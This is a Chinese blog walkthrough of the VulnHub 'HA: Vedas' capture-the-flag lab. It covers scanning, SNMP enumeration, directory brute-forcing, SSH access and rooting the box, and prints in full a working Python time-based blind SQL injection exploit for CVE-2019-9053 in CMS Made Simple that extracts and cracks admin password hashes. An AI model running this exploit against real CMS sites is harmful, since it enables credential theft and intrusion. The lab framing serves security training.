渗透测试-CTF-VulnHub - vedas

最新推荐文章于 2024-05-26 13:24:31 发布
最新推荐文章于 2024-05-26 13:24:31 发布
阅读量202 收藏
点赞数 1
分类专栏: 靶机 文章标签: linux python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/118325993
版权

渗透测试-CTF-VulnHub - vedas

arp-scan -l 扫描靶机IP地址

nmap -sV -Pn -A x.x.x.129

打开80端口,发现无可利用信息

打开msf,使用snmp_enum查看信息

输入靶机IP地址,获得第一个flag

使用cewl制作字典文件再次进行dirb遍历

dirb扫描

发现目录

查找CMS漏洞信息存在CVE-2019-9053

获取POC代码

import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
 
url_vuln = 'http://10.10.10.128/Kashyapa/moduleinterface.php?mact=News,m1_,default,0&m1_idlist='
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
 
flag = True
password = ""
sleep_time = 1
username = ""
result = ""
email = ""
salt = ""
 
def get_salt():
    global flag
    global salt
    global result
    salt = ""
    ord_salt = ""
    ord_salt_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_salt = salt + dictionary[i]
            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
            payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
            url = url_vuln + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= sleep_time:
                flag = True
                break
        if flag:
            salt = temp_salt
            ord_salt = ord_salt_temp
    flag = True
    result += '\n[+] Salt for password found: ' + salt
    
def get_username(userid):
    global flag
    global username
    global result
    username = ""
    ord_username = ""
    ord_username_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_username = username + dictionary[i]
            ord_username_temp = ord_username + hex(ord(dictionary[i]))[2:]
            payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users+where+username+like+0x" + ord_username_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
            url = url_vuln + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= sleep_time:
                flag = True
                break
        if flag:
            username = temp_username
            ord_username = ord_username_temp
    result += '\n[+] Username found: ' + username
    flag = True
    if username:
        return True
    else:
        return False
 
def get_email(userid):
    global flag
    global email
    global result
    email = ""
    ord_email = ""
    ord_email_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_email = email + dictionary[i]
            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
            payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
            url = url_vuln + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= sleep_time:
                flag = True
                break
        if flag:
            email = temp_email
            ord_email = ord_email_temp
    result += '\n[+] Email found: ' + email
    flag = True
    
def get_password(userid):
    global flag
    global password
    global result
    password = ""
    ord_password = ""
    ord_password_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_password = password + dictionary[i]
            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
            payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users"
            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
            url = url_vuln + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= sleep_time:
                flag = True
                break
        if flag:
            password = temp_password
            ord_password = ord_password_temp
    flag = True
    result += '\n[+] Password found: ' + password
 
def crack_password():
    global password
    global result
    global salt
    dict = open("/root/dic.txt") #修改生成的字典文件地址
    for line in dict.readlines():
        line = line.replace("\n", "")
        if hashlib.md5(str(salt) + line).hexdigest() == password:
            result += "\n[+] Password cracked: " + line
            break
    dict.close()
 
def beautify_print():
    global result
    cprint(result,'green', attrs=['bold'])
 
def main():
    global result
    for i in range(1, 10):
        get_salt()
        user_exist = get_username(i)
        if user_exist:
            get_email(i)
            get_password(i)
            crack_password()
            beautify_print()
            result = ""
        else:
            break
 
main()

登录

在Default Extensions中发现第二个flag

发现ssh登录,进行登录

进入opt/test 查看第三个flag

找到第三个flag

三个flag有个共同的点 Way to Root做字符串连接后 0e462097431906509019562988736854 查询密码结果 240610708

查看home目录下有vedas用户,登录root用户

在root目录下查看flag

xzhome
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hack the LAMPSecurity: CTF8 (CTF Challenge)
墙角睡大觉的专栏
07-30 1667
欢迎来到boot2root CTF挑战“LAMPSecurity:CTF8”由madirsh2600上传到vulnhub。因为,有一个主题,你需要获取flag以完成挑战,下载地址。 https://www.vulnhub.com/entry/lampsecurity-ctf8,87/ 根据作者描述,该漏洞靶机环境有很多种技术可以获得root权限。但这中间并没有利用开发/缓冲区溢出。因此,根据我们的...
59-59.渗透测试-CTF题目案例.mp4
05-10
59-59.渗透测试-CTF题目案例.mp4
ctf8 vulnhub靶场
weixin_62621015的博客
03-08 389
ctf8 vulnhub靶场; 这个靶场对我一个初学者来说有点复杂 :-(
CMS Made Simple (CMSMS) < 2.2.10 前台SQL注入漏洞(CVE-2019-9053
最新发布
shierbai的博客
05-26 223
结合后台的 SSTI 漏洞([CVE-2021-26120](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2021-26120)),攻击者可在目标服务器上执行任意代码。安装过程请根据页面中的安装向导来进行,其中MySQL数据库的地址是`db`,数据库名是`cmsms`,账号和密码均为`root`。使用中的脚本来利用SQL注入漏洞。
VulnCTF的练习教室v1.0-------WEB-----------第一题【LFI | 伪协议】
大方子
10-04 973
项目地址:https://github.com/jianmou/VulnCTF ============================ 个人收获: 1.利用PHP内置协议直接读取网页代码   ==============================     题目:   我们查看下网页源码 通过代码发现是文件包含。   我们把url改为http://local...
HA: VEDAS靶机
小小猪的博客
09-19 634
home目录下面还存在一个vedas用户,进行切换,并获得root权限。最终在/opt/test目录下面查看到第三个flag。nmap进行端口和服务扫描,发现80以及22端口。nmap探测udp服务,发现一个snmp服务。目录进行爆破,并无找到可以利用方式。查看到第一个flag,以及一段字符。查看root目录,发现第四个flag。将所得的字符进行拼接,发现是md5。查看该服务的漏洞利用方式。查看该文件使用方法以及内容。查看该cms的历史漏洞。进行爆破,需要安装模块。发现网页,是个cms。
vulnhub靶场,vedas
kukudeshuo的博客
08-31 446
vulnhub靶场,vedas 环境准备 靶机下载地址:https://www.vulnhub.com/entry/ha-vedas,587/ 攻击机:kali(192.168.109.128) 靶机:vedas(192.168.109.173) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 查看一下官方说明 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.173 使用nmap扫描查看目标靶机端
66-66.渗透测试-CTF题目分析.mp4
05-10
66-66.渗透测试-CTF题目分析.mp4
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在...
超微X11SPW-CTF主板用户手册
04-01
超微X11SPW-CTF主板用户手册
My-CTF-Challenges
05-16
【标题】"我的CTF挑战"是一个集合,包含了一系列网络安全竞赛中的挑战,旨在提升参赛者在信息安全领域的技能和知识。这个挑战集可能是为一个名为"周大福"的活动或组织设计的。其中的一个具体挑战是"TCTF2018_决赛",...
CMS Made Simple (CMSMS) 前台SQL注入漏洞 CVE-2019-9053.md
04-08
CMS Made Simple (CMSMS) 前台SQL注入漏洞 CVE-2019-9053.md
vedas靶机渗透攻略
weixin_47311099的博客
01-13 783
信息收集 nmap扫描 nmap -sC -sV 192.168.93.0/24 -p- ​ 目标192.168.93.135 开放22ssh 80http 网站信息收集 首页没啥东西 目录爆破也没啥,22端口爆破太费劲… ​ 扫描udp协议 tcp没思路,扫扫udp nmap -sU -sV 192.168.93.135 68dhcp没啥用,161snmp倒是有点意思 ​ ​ ​ msf探测snmp信息 search snmp ​ use 25 发现一个flag,并提示去root的方式 一串
Tryhackme-Simple CTF
个人博客
09-24 220
Simple CTF 文章目录Simple CTFTask1 Task1 1.How many services are running under port 1000? 2.What is running on the higher port? ssh 3.What’s the CVE you’re using against the application? CVE-2019-9053 NVD - CVE-2019-9053 (nist.gov) 4.To what kind of vulne
代码审计原理与实践分析-SQL篇(一)
Panda - 专注于网络空间安全研究 - www.cnpanda.net
06-27 784
一、前言 一年的考研复习终于过去,虽然没有按着自己想法走,但终是上了岸。因为有了时间,因此打算将以前一直想做的关于代码审计原理和实践总结给写出来,内容主要是通过分析Web漏洞的原理,结合CVE实例,来分析SQL漏洞、XSS漏洞、上传漏洞、执行漏洞等,由于篇幅较长,会分为一系列的文章。本系列文章仅作为自己学习笔记所用,有错误的地方欢迎共同讨论交流。 二、学习环境 PHP(主要为PHP,个别是Java...
渗透测试No.23 wave信息隐藏 look命令提权 HackSudo-FOG
hljzzj的博客
02-07 474
扫描公众号关注更多打靶文章 靶机信息 下载地址: https://www.vulnhub.com/entry/hacksudo-fog,697/ 靶场: VulnHub.com 靶机名称: HackSudo-FOG 难度: 简单 发布时间: 2021年5月14日 提示信息: 无 目标: 4个flag 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -sP 192.16..
CVE-2019-2725漏洞环境搭建与测试
信息安全
08-07 8136
搭建漏洞环境(被攻击) 安装weblogic 10.3.6.0 关闭windows防火墙 打开安装包,一直下一步,直到出现如下界面 然后一直下一步 安装完成后 进入C:\Oracle\Middleware\user_projects\domains\base_domain,双击脚本 用浏览器访问http://127.0.0.1:7001/co...
cve-2019-9766引出的缓冲区漏洞学习
zwish的信安之路
06-25 1544
通过工程实践引出的缓冲区溢出,缓冲区溢出 缓冲区攻击的最终目的就是希望系统能执行这块可读写内存中已经被蓄意设定好的恶意代码。 1、栈的结构 1、先进后出。 2、在内存中表现为从高地址往低地址增长。 3、栈顶:栈的最上方(低地址区)。 4、栈低:栈的最下方(高地址区)。 基本的进程地址空间分布: 2、基本栈溢出: 缓冲区溢出示意图: 如果在数据段(右边的data)就保存了一系列的指令的二进制代码...
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一) 在这篇文章中,我们将学习如何搭建Vulnhub靶机渗透环境,并学习JIS-CTF入门知识,以及蚁剑提权示例。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值